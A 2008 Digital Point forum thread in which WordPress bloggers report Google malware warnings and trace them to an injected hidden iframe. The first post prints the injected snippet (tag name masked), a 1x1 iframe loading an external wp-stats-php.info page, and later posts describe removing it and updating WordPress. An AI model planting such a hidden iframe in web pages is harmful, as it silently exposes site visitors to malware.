Digital Point Forums
Winn Law Group

Go Back   Digital Point Forums > The Digital Point > General Chat
Google Analytics
Log In to view
your analytics

Reply
 
Thread Tools
  #1  
Old Feb 21st 2008, 1:32 pm
domainer_10 domainer_10 is offline
of the Nightfall
 
Join Date: Dec 2007
Posts: 1,748
domainer_10 will become famous soon enough
Hacker sabotoging sites in Google with malware code

Recently one of my blogs got a malware warning. I sent in a review at google and they rejected it. I then looked at my code more closely and realized somehow someone inserted

Where **** = iframe

<***** src=http://www.wp-stats-php.info/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe>


I then noticed another blogger I know complaining about how he also got a malware warning for his site. I looked over his site and noticed HE TOO also had the same code inserted into his post by a hacker.

Both of our sites are using wordpress. I'm using the most recent version.
Reply With Quote
  #2  
Old Feb 21st 2008, 2:03 pm
domainer_10 domainer_10 is offline
of the Nightfall
 
Join Date: Dec 2007
Posts: 1,748
domainer_10 will become famous soon enough
I removed the code, they were using an exploit in a older version of wordpress.


Anyways, the point is hackers are now installing stuff on websites that can cause you to get a malware warning on your website. So now we have ONE more thing that google can screw us over with.
Reply With Quote
  #3  
Old Feb 21st 2008, 2:25 pm
seo daddy seo daddy is offline
Hand of A'dal
 
Join Date: Oct 2007
Posts: 410
seo daddy is on a distinguished road
Quote:
Originally Posted by domainer_10 View Post
I removed the code, they were using an exploit in a older version of wordpress.


Anyways, the point is hackers are now installing stuff on websites that can cause you to get a malware warning on your website. So now we have ONE more thing that google can screw us over with.
Interesting
Was this on the latest version of wordpress?

I think this bug hass been fixed by matt and the wordpress gang..
Reply With Quote
  #4  
Old Feb 21st 2008, 2:38 pm
SB Marketing SB Marketing is offline
Grunt
 
Join Date: May 2007
Location: Pittsburgh, PA
Posts: 66
SB Marketing is on a distinguished road
Word Press Virus

I had the same issue. the Steps I took to Resolve the Issue.

- Installed latest version of Word Press

- Deleted script from posts (found in 2)

- Replied through Google webmasters tools that site was clean.

Hope this helps some of you.
__________________
Las Vegas Strip Early Vegas
MGM Hotel MGM Grand Las Vegas Wynn Hotel promo codes
Reply With Quote
Reply

Bookmarks

Thread Tools

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off


Similar Threads
Thread Thread Starter Forum Replies Last Post
Pay-ads is Malware - got Malware Warning for my blog from google after adding pay-ads lalitnagrath Pay Per Click Advertising 20 Oct 28th 2008 7:32 pm
Worried about Hacker/Malicious Code thedarkest1666 Programming 5 Nov 7th 2007 10:39 pm
Malware notification from Google EV1L Google 5 Aug 7th 2007 9:09 pm
Google Malware Warning Master_Moving Google 2 Feb 27th 2007 4:55 pm
Google Malware Warning andre75 Google 5 Oct 20th 2006 9:57 am


All times are GMT -8. The time now is 1:45 pm.